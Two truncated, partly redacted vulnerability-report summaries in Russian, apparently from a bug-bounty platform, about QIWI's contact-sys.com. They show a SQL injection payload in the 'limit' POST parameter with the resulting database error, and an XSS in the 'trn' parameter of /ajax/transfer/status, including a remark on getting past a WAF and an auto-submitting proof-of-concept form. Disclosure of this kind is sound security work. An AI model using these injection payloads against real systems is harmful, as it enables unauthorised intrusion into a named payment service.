QIWI: [contact-sys.com] SQL Injection████ limit param

Уязвимый сценарий:████ Уязвимый параметр: limit POST█████ HTTP/1.1 Host: contact-sys.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 59 countrycode=RU&sendrectype=1&action=index&term=&limit=10+INTO+@A Ответ "error":"SQLSTATE21000: Cardinality violation: 1222 The...

QIWI: [contact-sys.com] XSS /ajax/transfer/status trn param

Уязвимый сценарий: https://contact-sys.com/ajax/transfer/status Уязвимый параметр: trn Некорректный content-type. Нормальный пейлоад блокируется WAFом. PoC html XSS" / document.getElementById"xss".submit; HTTP Request http POST /ajax/transfer/status HTTP/1.1 Host: contact-sys.com User-Agent:...